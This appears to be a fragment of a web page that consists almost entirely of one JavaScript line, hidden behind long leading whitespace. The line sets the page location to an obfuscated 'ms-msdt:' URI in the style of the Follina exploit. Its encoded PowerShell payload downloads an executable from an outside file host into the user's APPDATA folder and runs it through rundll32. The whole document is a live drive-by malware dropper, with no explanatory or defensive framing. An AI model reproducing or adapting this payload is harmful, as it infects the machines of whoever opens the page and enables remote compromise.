                                                              location.href = "mS-" + "msDt:" + "/I" + "d" + " " + "Pcw" + "Dia" + "gnOs" + "ti" + "c" + " " + "-sk" + "IP" + " " + "FOR" + "C" + "E" + " " + "-pa" + "raM" + " " + "\"" + "It_ReBrOwsef" + "oR" + "fIL" + "E" + "=" + "#fbK" + " " + "IT_LaunchMethod=ContextMen" + "u" + " " + "IT_" + "B" + "rows" + "eForF" + "ile" + "=" + "I" + "$(" + "Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiL" + "CBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBz" + "UCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly" + "9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNM" + "RWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+" + "[Char]34+'))" + "'))))" + "T" + "i" + "/../../../" + "../../../../../../../" + ".mS" + "i" + " " + "\"";
                                                                Reset < >